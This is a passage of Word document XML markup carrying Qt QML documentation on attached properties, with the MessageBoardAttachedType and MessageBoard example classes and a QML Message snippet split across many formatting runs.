          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>published</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">signal and an expired property. </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This type is implemented by</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>MessageBoardAttachedType</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>below</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA77C2" w:rsidRPr="00DA77C2" w:rsidRDefault="00DA77C2" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Message</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object, which will be the</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attachee</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA77C2" w:rsidRPr="00DA77C2" w:rsidRDefault="00DA77C2" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MessageBoard</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type, which will be the</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attaching type</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>that is used by</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Message</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>objects to access the attached attributes</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Following is an example implementation. First, there needs to be an</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attached object type</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>with the necessary properties and signals that will be accessible to the</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attachee</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>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class</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MessageBoardAttachedType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public</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QObject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Q_OBJECT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Q_PROPERTY</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bool</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> expired READ expired WRITE expired NOTIFY expiredChanged</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public</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MessageBoardAttachedType</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QObject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parent</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bool</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> expired</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const</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void</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> setExpired</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bool</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> expired</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signals</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void</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> published</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> expiredChanged</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Then the</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attaching type</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</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MessageBoard</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, must declare a</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qmlAttachedProperties()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>method that returns an instance of the</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attached object type</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>as implemented by MessageBoardAttachedType. Additionally,</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w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>board must be declared as an attached type through the</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId253" w:anchor="QML_DECLARE_TYPEINFO" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML_DECLARE_TYPEINFO</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() macro:</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class</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MessageBoard</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public</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QObject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Q_OBJECT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public</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static</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MessageBoard</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qmlAttachedProperties</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QObject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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object</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return</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new</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MessageBoardAttachedType</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object</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ln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML_DECLARE_TYPEINFO</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MessageBoard</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QML_HAS_ATTACHED_PROPERTIES</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Now, a</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w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type can access the properties and signals of the attached object type:</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Message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author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"Amelie"</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creationDate</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new</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Date</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MessageBoard</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expired</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creationDate </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
